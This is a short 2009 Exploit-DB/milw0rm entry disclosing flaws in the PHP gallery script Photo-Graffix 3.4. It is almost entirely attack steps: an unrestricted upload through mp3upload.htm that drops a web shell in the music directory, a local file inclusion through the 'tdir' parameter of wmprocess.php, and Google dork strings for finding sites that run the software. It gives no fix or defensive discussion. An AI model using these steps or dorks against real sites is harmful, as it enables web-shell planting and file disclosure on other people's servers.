photo graffix 3.4 - Multiple Vulnerabilities

EDB-ID:

8372

CVE:





Platform:

PHP

Date:

2009-04-08


  =-=-shell upload/local file-=-=

-=-=-=-=-=-=-=-=-=-=
script::Photo-GraffixV3.4.zip

Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.photo-graffix.com/V3/Photo-GraffixV3.4.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
upload:
/path/mp3upload.htm ===> shell upload

shell = /path/music/shell.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/wmprocess.php?tdir=[open local file]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
dork: "powered by Photo-Graffix Flash Image Gallery"
  "powered by Photo-Graffix"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2009-04-08]